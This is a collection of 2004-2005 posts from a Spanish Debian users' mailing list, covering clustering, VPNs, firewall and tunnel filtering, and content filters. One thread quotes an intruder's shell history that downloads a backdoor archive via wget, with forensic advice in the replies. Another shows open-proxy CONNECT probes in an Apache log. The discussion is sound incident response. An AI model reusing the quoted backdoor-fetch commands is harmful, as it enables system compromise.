Re: Cluster de Apache/Web sobre Debian

2005-03-11 Por tema Iñaki R.

Buenas Txente

Txente wrote:

 Hola lista,

 Quiza sea un O.T. aunque siendo la plataforma sobre la que quiero
 montarlo, Debian, me parecio el mejor lugar para preguntar.

 En el trabajo tenemos la necesidad de montar un cluster web, y la
 verdad es que no tengo ni remota idea de por donde empezar.

 Las maquinas sobre las que se montaria todas tendrian Debian. Hasta
 ahi es sencillo. El problema viene al hacer que con una sola IP,
 acceda al servicio la maquina cliente, y si se cae una de las
 maquinas, automaticamente la siguiente de el relevo.

 Estuve googleando bastante ayer, y lo unico que vi parecido era
 algo llamado LVS, pero es un tema que aparentemente esta parado
 desde mediados de 2004, es un tema que podriamos llamar de
 extension de kernel y solo tiene hasta el kernel 2.4, siendo este
 un problema ya que las maquinas que usamos aqui tienen todas 2.6.8


LVS no es ni mucho menos un proyecto discontinuado, de hecho viene
incluido en la rama 2.6 del kernel. Con LVS podría montar una granja
de servidores web con una sola ip virtual. Además puedes usar
heartbeat (www.linux-ha.org) para establecer un mecanismo de failover
entre los servidores web de tal manera que si uno de los servidores
web cae, el otro pueda suplantar su ip.

 ¿alguien ha tenido alguna vez la necesidad de hacer esto? ¿alguien
 lo ha hecho?


 Cualquier idea/sugerencia sera bien recibida.

Enlaces: http://www.linux-ha.org/
 http://www.ultramonkey.org/

 Gracias y un saludo,

 Txente


Un saludo,

Iñaki R.


-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]



Re: VPNs y demases

2005-03-02 Por tema Iñaki R.
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1
 


[EMAIL PROTECTED] wrote:

 OpenVPN no es compatible con IPSEC. Te repito: encripta con
 SSL/TLS.


 Y con IPSEC alguna conocida, buena y facil?

 Tengo entendido que Freeswan murio o sigue?

FreeSwan sigue vivo, aunque desde la rama 2.6 del kernel la gente se
ha tirado a usar el soporte nativo de ipsec del nucleo, que es más
sencillo de utilizar. En la biblia del enrutamiento (o sea Linux
Advanced Routing and Traffic Control - www.lartc.org) pudes encontrar
ejemplos de uso.

 Salu2 a to2 y grax

Un saludo,

Iñaki R.
-BEGIN PGP SIGNATURE-
Version: GnuPG v1.4.0 (MingW32)
Comment: Using GnuPG with Thunderbird - http://enigmail.mozdev.org
 
iD8DBQFCJelTi0sv9i/vNakRAuf0AJ94zSbc07JpUBX/jQIlMm93kgIDSQCgikS4
InRnovDVk+irWmZ1xQII6N4=
=BdRR
-END PGP SIGNATURE-


-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]



Re: Filtrar tunel SOCKS/HTTP

2005-02-15 Por tema Iñaki R .
Hola Alejandro,

puedes probar una solución como integrar snort-inline dentro del firewall
para cazar esos connects y denegarlos.

Un saludo,

Iñaki R.
- Original Message -
From: Alejandro [EMAIL PROTECTED]
To: Debian Lista debian-user-spanish@lists.debian.org
Sent: Tuesday, February 15, 2005 6:08 PM
Subject: Filtrar tunel SOCKS/HTTP


 Hola, dias atras habia preguntado cosas sobre tuneles que usaban el metodo
 CONNECT y ya esta, ya lo tengo clarito.

 Ahora mi duda es con los tuneles que usan ciertos softwares como el
 http-tunnel para Windows (www.http-tunnel.com), el cual instala un server
 SOCKS en la PC de una LAN que escucha peticiones de programas como el
 navegador, P2P, clientes FTP, etc. y luego convierte todas esas peticiones
 en trafico HTTP que pasa por el port 80 del firewall tranquilamente. Ese
  trafico se direcciona a un servidor de tunel que esta en USA y este es
el
 encargado en realizar las peticiones y devolverlas al cliente original. En
 definitiva, el firewall/proxy de la LAN solo ve pasar trafico web y no
sabe
 nada de su contenido.

 Yo tengo un esquema de seguridad con linux/iptables/squid pero cuando
activo
 el http-tunnel en una Windows de mi red interna, me saltea toda la
seguridad
 y no se como hacer para filtrarlo. Supongo que algun firewall con filtrado
 de contenido en capa 7 podria hacerlo, pero me gustaria que me digan uds.
 que harian y si se puede filtrar este tipo de tunel.

 Muchas gracias como siempre.

  Alejandro


 --
 To UNSUBSCRIBE, email to [EMAIL PROTECTED]
 with a subject of unsubscribe. Trouble? Contact
[EMAIL PROTECTED]



-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]



Re: Filtrar tunel SOCKS/HTTP

2005-02-15 Por tema Iñaki R .
Lo que puedes hacer un volcado de los paquetes que saca http tunnel y
observar su compartamiento. Después en base a ese estudio, puedes generar
una regla en snort-inline para que deniegue esas conexiones.

Un saludo y suerte ;)

Iñaki R.
- Original Message -
From: Alejandro [EMAIL PROTECTED]
To: Iñaki R. [EMAIL PROTECTED]; Debian Lista
debian-user-spanish@lists.debian.org
Sent: Tuesday, February 15, 2005 6:50 PM
Subject: Re: Filtrar tunel SOCKS/HTTP


 Iñaki, gracias por responder.

 Pero justamente este software no usa el metodo CONNECT (eso creo yo) dado
 que el SQUID tiene denegado dicho metodo hacia ningun otro port que no sea
 el 443, y asi y todo el trafico sale igual por HTTP.

 Y la explicacion del software
 (http://www.http-tunnel.com/html/solutions/http_tunnel/client.asp) dice
que
 saca todo el trafico a traves del port 80 (y no del 443 o algun otro
 accesado por el metodo CONNECT)...me confunde.

 En fin...vere si lo puedo sacar.
 Muchas gracias !!!

 Alejandro



 - Original Message -
 From: Iñaki R. [EMAIL PROTECTED]
 To: Debian Lista debian-user-spanish@lists.debian.org
 Sent: Tuesday, February 15, 2005 2:20 PM
 Subject: Re: Filtrar tunel SOCKS/HTTP


  Hola Alejandro,
 
  puedes probar una solución como integrar snort-inline dentro del
firewall
  para cazar esos connects y denegarlos.
 
  Un saludo,
 
  Iñaki R.
  - Original Message -
  From: Alejandro [EMAIL PROTECTED]
  To: Debian Lista debian-user-spanish@lists.debian.org
  Sent: Tuesday, February 15, 2005 6:08 PM
  Subject: Filtrar tunel SOCKS/HTTP
 
 
   Hola, dias atras habia preguntado cosas sobre tuneles que usaban el
 metodo
   CONNECT y ya esta, ya lo tengo clarito.
  
   Ahora mi duda es con los tuneles que usan ciertos softwares como el
   http-tunnel para Windows (www.http-tunnel.com), el cual instala un
 server
   SOCKS en la PC de una LAN que escucha peticiones de programas como el
   navegador, P2P, clientes FTP, etc. y luego convierte todas esas
 peticiones
   en trafico HTTP que pasa por el port 80 del firewall tranquilamente.
Ese
trafico se direcciona a un servidor de tunel que esta en USA y este
es
  el
   encargado en realizar las peticiones y devolverlas al cliente
original.
 En
   definitiva, el firewall/proxy de la LAN solo ve pasar trafico web y no
  sabe
   nada de su contenido.
  
   Yo tengo un esquema de seguridad con linux/iptables/squid pero cuando
  activo
   el http-tunnel en una Windows de mi red interna, me saltea toda la
  seguridad
   y no se como hacer para filtrarlo. Supongo que algun firewall con
 filtrado
   de contenido en capa 7 podria hacerlo, pero me gustaria que me digan
 uds.
   que harian y si se puede filtrar este tipo de tunel.
  
   Muchas gracias como siempre.
  
Alejandro
  
  
   --
   To UNSUBSCRIBE, email to [EMAIL PROTECTED]
   with a subject of unsubscribe. Trouble? Contact
  [EMAIL PROTECTED]
  
 
 
  --
  To UNSUBSCRIBE, email to [EMAIL PROTECTED]
  with a subject of unsubscribe. Trouble? Contact
 [EMAIL PROTECTED]
 


 --
 To UNSUBSCRIBE, email to [EMAIL PROTECTED]
 with a subject of unsubscribe. Trouble? Contact
[EMAIL PROTECTED]



-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]



RE: [APACHE] extraña petición en mi access_log

2004-10-13 Por tema Iñaki R .
Buenas, 

Son pruebas para ver si el proceso que escucha en ese puerto puede ser
usadao como un Proxy http abierto.

Saludo,

Iñaki R.

-Mensaje original-
De: Mstaaravin / [mailto:[EMAIL PROTECTED] 
Enviado el: miércoles, 13 de octubre de 2004 16:19
Para: debian-user-spanish@lists.debian.org
Asunto: [APACHE] extraña petición en mi access_log

Buenas, revisando los logs de mi Apache me he encontrado 
con esta petición un tanto extraña, mas a sabiendas que 
mi Apache le respondió con un 200 (http OK)
Y a pesar que estoy buscando info en foros y demas no le 
encuentro la explicación.
Alguien sabe identificarla.?

65.59.208.125 - - [13/Oct/2004:11:32:22 +] POST 
http://65.59.208.125:25/ HTTP/1.1 200 785
65.59.208.125 - - [13/Oct/2004:11:32:22 +] CONNECT 
mailin-02.mx.aol.com:25 HTTP/1.0 200 785
65.59.208.125 - - [13/Oct/2004:12:12:43 +] CONNECT 
mx2.optonline.net:25 HTTP/1.0 200 785
65.59.208.125 - - [13/Oct/2004:12:12:43 +] POST 
http://65.59.208.125:25/ HTTP/1.1 200 785

-- 
Cordiales Saludos

La Voluntad es el único motor de nuestros logros
Mstaaravin
http://www.mstaaravin.com.ar


-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of unsubscribe. Trouble? Contact
[EMAIL PROTECTED]



RE: listar usuarios desde la consola

2004-10-13 Por tema Iñaki R .


Buenas,

blackshadow:~# cat /etc/passwd | cut -d: -f1

Un saludito listeros/as

Iñaki R.

-Mensaje original-
De: Roberto Lizana Ramirez [mailto:[EMAIL PROTECTED] 
Enviado el: miércoles, 13 de octubre de 2004 15:52
Para: debian-user-spanish@lists.debian.org
Asunto: listar usuarios desde la consola

Ummm, no se, se ve que el puente me ha dejado un poco acarajotado, la
pregunta es muy tonta pero...

 

 

¿Cómo puedo listar los usuarios que tiene mi sistema desde
la consola?

 

 

 

Perdon por la pregunta pero es que ya estoy desesperado preguntandole al
dios google y no tengo forma de que me de una señal.

 

Gracias de antemano


---
Outgoing mail is certified Virus Free.
Checked by AVG anti-virus system (http://www.grisoft.com).
Version: 6.0.776 / Virus Database: 523 - Release Date: 12/10/2004
 



[OT?] Bug en psybcn 2.3.2-4

2004-07-31 Por tema Iñaki R .
Buenas a todos/as,
 
Posiblemente esta no se la lista más adecuada, pero bueno yo os aviso que no
está de más. Hace una semana más o menos descubrí un fallo en este programa,
psybnc, que para los que no lo sepan, se usa para hacer de bouncer a una red
de irc. El caso es que instalándoselo a un amigo me di cuenta de que podía
bajarme cualquier fichero del servidor donde lo tenía. Avisé a sus
programadores aunque aún no me han dicho nada (no sé, pero parece que lo
tienen bastante abandonado). 
 
Posiblemente alguno de los presentes lo use en algún servidor (me consta que
mucha gente vende este tipo de conexiones), así que para que no se
preocupen, os dejo una web donde tengo tanto el advisory (que si alguien
quiere traducirlo al inglés...) y un parche para corregir este fallo.
 
http://virtualminds.sytes.net
 
Un saludo gentes,
 
Iñaki R. (Shad)



RE: Paquetes antiguos

2004-07-30 Por tema Iñaki R .
Gracias Santiago, es justo lo que estaba buscando.

Un saludo,

Iñaki R. 

-Mensaje original-
De: Santiago Vila [mailto:[EMAIL PROTECTED] 
Enviado el: viernes, 30 de julio de 2004 12:17
Para: debian-user-spanish@lists.debian.org
Asunto: Re: Paquetes antiguos

On Fri, 30 Jul 2004, Iñaki R. wrote:

 estoy haciendo un pequeño honeypot para aumentar conocimientos y 
 necesitaría paquetes antiguos de debian que sean explotables. Hace 
 tiempo creo que leí que con apt podías bajarte versiones antiguas de 
 los paquetes, pero no me hagáis mucho caso.

 Mi pregunta: Sabéis si hay alguna manera de conseguir estos paquetes 
 antiguos y explotables??

http://snapshot.debian.net



Paquetes antiguos

2004-07-29 Por tema Iñaki R .
Buenas a todos/as,
 
estoy haciendo un pequeño honeypot para aumentar conocimientos y necesitaría
paquetes antiguos de debian que sean explotables. Hace tiempo creo que leí
que con apt podías bajarte versiones antiguas de los paquetes, pero no me
hagáis mucho caso. 
 
Mi pregunta: Sabéis si hay alguna manera de conseguir estos paquetes
antiguos y explotables??
 
Saludos
 
Iñaki R. (Shad)




RE: Manejo IPTABLES

2004-07-27 Por tema Iñaki R .

Hola Laura,

Iptables en cuanto añades una regla, ya la tiene presente por lo que debería
mostrártela con iptables -L -n Sin embargo, cuando la tabla en la que metes
las reglas no es la principal (filter) sino otra como la nat, para mostrarlo
deberías poner iptables -t nat -L -n No digo que este sea el problema,
porque es mera conjetura, puesto que no dispongo de más datos. Si te parece
bien, podrías mandar a la lista un log con los comandos y sus salidas
respectivas a ver si entre todos/as te podemos ayudar.

Si quieres hacer las reglas permanentes, existe un comando que es
iptables-save para hacerlo, aunque yo te recomendaría que te hicieras un
script antes que usar esta última solución.


Un saludo,

Iñaki R.

-Mensaje original-
De: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED] 
Enviado el: martes, 27 de julio de 2004 13:18
Para: Lista Debian
Asunto: Manejo IPTABLES

Hola a [EMAIL PROTECTED],
estoy añadiendo algunas reglas a iptables, pero no se como comprobar
que
abren los puertos correctamente y demas, con iptables -L -n compruebo las
reglas, pero ¿como hago para q actualice los cambios? ¿es necesario
reiniciar todo el sistema? con /etc/init.d/iptables lo que sea no consigo
modificar la salida de iptables -L -n, por lo que supongo que no se realizan
cambios si no reinicio completamente, pero debe de haber una manera de
hacerlo sin reiniciar, si hago -F y luego -L -n me vuelve a cargar lo mismo
que antes ¿es posible porque este como established y este conectado? ¿como
se comprueba?
Gracias..




-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of unsubscribe. Trouble? Contact
[EMAIL PROTECTED]



RE: problema con scanf (novato)

2004-06-23 Por tema Iñaki R .
Weno, 

Efectivamente por lo que leo en el man, __fpurge() era lo que necesitabas.
Se ve que fflush() no actua en Linux como en otras plataformas. De todas
formas, cuidado con la función que no es estandar.

 Espero haberte ayudado algo, el C es un lenguaje algo complicado al 
 empezar, pero con el tiempo
 llega a ser apasionante y realmente muy potente.

Totalmente de acuerdo con segmentation_fault ;))

Un saludo,

Iñaki R.

p.d: Para más adelante, cuidado con scanf y los buffers overflows





RE: Jail vs. Chroot

2004-06-23 Por tema Iñaki R .

Yo por mi parte, he probado un par de veces chroot, para aislar ciertos
procesos propensos al bug. Aun así no me convencía mucho. Al final opté por
uml para tener dos máquinas en la misma, una en la que instalo los servicios
y la otra que uso para mis cosas. Aunque no es un servidor en producción,
sino más bien, un servidor personal donde desarrollo mis cosillas.

Sirva para avivar la discusión jeje

Un saludo a todos/as,

Iñaki R.

-Mensaje original-
De: Matias [mailto:[EMAIL PROTECTED] 
Enviado el: miércoles, 23 de junio de 2004 4:46
Para: debian-user-spanish@lists.debian.org
Asunto: Re: Jail vs. Chroot

El Tue, 22 Jun 2004 08:47:09 -0400 (PYT)
Caba [EMAIL PROTECTED] escribió:

 
 Hace tiempo que vengo implementado chroot, indistintamente con
 diversas aplicaciones, el drama surge al escapar los procesos de la
 prisión, siempre ocurre, por lo que Jail de FreeBSD estara siempre
 por encima de mismo.
 

Hola:
No entiendo muy bien tu duda, pero por lo que planteas es que deseas
un comentario sobre chroot y jail.

Yo por ahora nunca pude implementar un jail bajo GNU/Linux, pero si
lo he implementado sobre otro sistema operativo. La diferencia mayor,
como tu planteas, es que jail queda pro sobre todas las cosas, los
procesos que se ejecutan dentro del jail (casi) NUNCA podrán salir
hacia afuera. Esto quiere decir, que necesitarás (dentro de la jaula)
tener usuarios, ciertos dispositivos (como el /dev/null), y lo más
importante, todo lo que ejecutes dentro de la jaula quedará dentro de
la jaula, y lo que se está ejecutando fuera de la jaula será invisible
a ésta.

Esto es una diferencia muy grande con respecto al jail y chroot,
dado
que el chroot solamente cambia el raíz de lugar. Lo que no implica
nada cuando estás hablando de cosas que pueden resultar nocivas para
tu entorno.

Pero ten en cuenta que ambos entornos de trabajo son muy útiles para
distintas cosas. Por ejemplo, si tu estás haciendo una instalación (al
estilo bootstrap), con un simple chroot es suficiente.

Ahora bien, si tu quieres montar un servidor web con algunas
aplicaciones en las cuales tu no confías mucho, y quieres resguardar
un poco tu sistema (y no tienes máquinas como para hacerlo en
distintas máquinas), o quieres probar la instalación de algunas cosas,
un entorno jail creo que es muy conveniente.




-- 
Atentamente, yo Matías
CookBookXML: http://nnss.d7.be/~matias/CookBookXML/bin
http://www.nnss.d7.be
http://savannah.gnu.org/projects/tasklist


-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of unsubscribe. Trouble? Contact
[EMAIL PROTECTED]



RE: Ruteo sin NAT..

2004-04-20 Por tema Iñaki R .
Buenas, no me ha quedado muy claro la cantidad de ips públicas que tienes.
Te hago un grafiquillo de cómo lo entiendo.

   Ipp1
[Internet] - [Cisco] -- [  router Linux   ] 
Ipp2 / ipp3 | ipp4 \
/   |   \
   /|  \

[RED1][RED2]   [RED3]

Espero que salga bien. Entiendo que en cada red hay un equipo con una ip
pública más. Bien, si es así, yo dejaría al router Linux solamente con la ip
pública, en caso de que no vayas a prestar más servicio que el de routing.
Si quieres tener servicios tipo web, ftp, mail, etc ... puedes habilitar una
red aparte para los servicios y el resto como lo tienes pero con ips
privadas. 

Un saludete,

Iñaki R.
-Mensaje original-
De: SeB@ [mailto:[EMAIL PROTECTED] 
Enviado el: martes, 20 de abril de 2004 18:35
Para: debian-user-spanish@lists.debian.org
Asunto: Ruteo sin NAT..

Pregunta para los mas experimentados :-)


Es posible hacer un ruteo sin hacer NATeo??


la idea es la siguiente:
Tengo una conexion a internet y 16 ips
un Cisco 2600 conectado a movicon quien me provee internet, luego a este
tegno conectado una pc con linux que hace de router porque distribuye el
servicio de internet a 3 redes diferentes (esa es la idea)
Otro dato a tener en cta es que tengo ip publica en el cisco, en el
router linux(en las 4 eth) y en una de las pc de cada red conectada al
router linux.


me conviene hacer NAT y dejar de moletar??

saludos




RE: Evitar Spam en QMail

2004-03-30 Por tema Iñaki R .

Hola Gorka,

Yo tenía algo parecido a lo que propone en qmailrocks. Solo tenía la parte
de filtrado de virus, y con iptables en el gateway escaneaba todo el smtp
entrante y saliente. Solo me falló una vez y era porque el disco duro tenía
poca capacidad y se me lleno descomprimiendo un kernel. Actualmente lo tengo
montado en casa, en un pequeño servidor que gestiona un par de listas.

Sobre lo del spam, conozco a mucha gente que implementa o bien spamassasin o
bogofilter en qmail y les va de perlas. Y por si dudas de esa web, te diré
que en la lista de qmail-es siempre que alguien pregunta como hacer algo por
el estilo, es directamente redireccionado a qmailrocks.org.

Sin miedo y a por ello,

Iñaki R.


-Mensaje original-
De: Gorka Garay [mailto:[EMAIL PROTECTED] 
Enviado el: martes, 30 de marzo de 2004 16:28
Para: debian-user-spanish
Asunto: Evitar Spam en QMail

Hola lista,

Tengo qmail instalado y funcionando perfectamente con varios dominios. Ahora
querria probar a instalar algun software para eliminar spam y/o virus en el
propio servidor y he encontrado esto:

http://www.qmailrocks.org/install_db.htm

No quiero romper nada que ya funciona (lo mejor es enemigo de lo bueno)
asi que me gustaria asegurarme lo mas posible de que no me va a pasar nada
malo...

Alguien ha hecho algo asi? Creeis que lo que dice ese articulo puede
resultar?

Vuestra opinion me hara lanzarme a intentarlo, si me confirmais que lo que
se dice ahi tiene sentido y /o lo habeis hecho ya.

Salu2 y gracias.


-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of unsubscribe. Trouble? Contact
[EMAIL PROTECTED]



RE: bloquiar

2004-03-22 Por tema Iñaki R .


Mirate la combinación Squid + DansGuardian, el primero hace de Proxy y el
segundo actua como gestor de contenidos. Es un poco pesado, pero funciona
bastante bien.

http://www.squid-cache.org/ 
http://dansguardian.org/


Un saludo,

Iñaki R.


De: silviaguandique [mailto:[EMAIL PROTECTED] 
Enviado el: lunes, 22 de marzo de 2004 6:09
Para: debian-user-spanish@lists.debian.org
CC: [EMAIL PROTECTED]
Asunto: bloquiar

quiero saber como bloquiar paginas de porno grafia 



RE: Filtros de contenido en linux

2004-02-25 Por tema Iñaki R .
Buenas,

 Prueba Squid + DansGuardian

Un saludo, 

Iñaki R.


-Mensaje original-
De: Nerox NRX [mailto:[EMAIL PROTECTED] 
Enviado el: miércoles, 25 de febrero de 2004 9:18
Para: debian-user-spanish@lists.debian.org
Asunto: Filtros de contenido en linux

Hola, ¿Conoceis algun filtro de contenido para linux? Gracias.

_
Encuentra a tu media naranja entre los perfiles que más te gusten. Toda la 
magia del romance en MSN Amor  Amistad. http://match.msn.es/


-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of unsubscribe. Trouble? Contact
[EMAIL PROTECTED]



RV: Fui atacado]

2004-02-20 Por tema Iñaki R .

Buenas,

Antes de nada saludos a la lista que es la primera vez que posteo. 

A renglón seguido, puedes probar a mirar en /proc los números de
proceso. Los directorios que son numeros, son los identificadores de los
procesos que hay. Puedes acceder a ellos y con un simple cat ver datos sobre
ese proceso. 

Además puedes comprobar si con lsmod observas algún módulo extraño.
Si lo ha hecho bien, que lo dudo, si ha troyanizado el sistema no aparecerá.
Pero igual suena la campana y lo pillas. 

Observa los logs en /var/log para ver si puedes recabar más info
sobre el tipo que te ha entrado.

Mira tambien que no haya en tu home otros históricos de otros
interpretes (que se suele hacer para dejar las menos huellas posibles).

Con netstat -vaptn podrás observar (repito que siempre y cuando no
esté bien troyanizado el sistema) los procesos que escuchan cada puerto.

Y como punto final, la próxima vez usa algo como Aide para hacer una
imagen del sistema intacta y comparar en caso de que creas que ha habido una
intrusión.

Un saludo a todos/as,

Iñaki R.

-Mensaje original-
De: SoTaNeZ [mailto:[EMAIL PROTECTED] 
Enviado el: viernes, 20 de febrero de 2004 16:40
Para: debian-user-spanish@lists.debian.org
Asunto: Re: Fui atacado]

== nada de fecha 18 de febrero en el syslog. Luego hice un history y me
== aparecio esto que por su puesto yo no lo hice(màs raro aun):
== 
==  484  cat /etc/issue
==   485  ps
==   486  bash
==   487  /usr/sbin:/sbin:/usr/bin:/bin:/lib/security/.config/bin
==   488  netstat -a
==   489  cd /lib/security/.config/bin
==   490  cd /lib/security/.config
==   491  dir
==   492  cd ssh
==   493  dir
==   494  cd ..
==   495  wget http://www.gwydiondylan.org/downloads/binaries/linux/x86 496
==  /tar/gwydion-dylan-2.3.10-x86-linux.tar.gz
==   497  wget
==
http://www.gwydiondylan.org/downloads/binaries/linux/x86/tar/gwydion-dylan-2
.3.10-x86-linux.tar.gz
==   498  wget geocities.com/s3rjiu/backdoor/ser.tar.gz
== 
== Esto paquete porsuesto no los baje.

Parece que se han colado en tu ordenador y se han bajado un backdoor de esos
(y no ha borrado el historial, animalito). Pues yo me iría para empezar a la
pagina de la que se ha bajado el backdoor, para ver que es lo que hace, y
conectate a internet lo menos posible, y pon un firewall que bloquee
practicamente todo menos lo necesario. Mira los servicios abiertos a
internet y el kernel, a ver que vulnerabilidades tienen. También te puedes
bajar el manual análisis forense en linux o algo así que esta en
es.tldp.org. Y si quieres una lista mejorcita pues apuntate a la lista
hackindex (busca en google la web).
== 
== Ah hago un ps y no sale nada, me dice esto:
== Violación de segmento

Vaya, eso igual lo ha echo el troyano.
No soy ningún experto, asi que no puedo ayudar más, saludos.

== Cual es la inseguridad que tengo?
== 
== Gracias y saludos..
== 
== -- 
== Federico Contreras
== T.S.U. en Informática
== U.D.O.
== 
-- 
No hay nada peor que ser vulgar
[EMAIL PROTECTED]


-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of unsubscribe. Trouble? Contact
[EMAIL PROTECTED]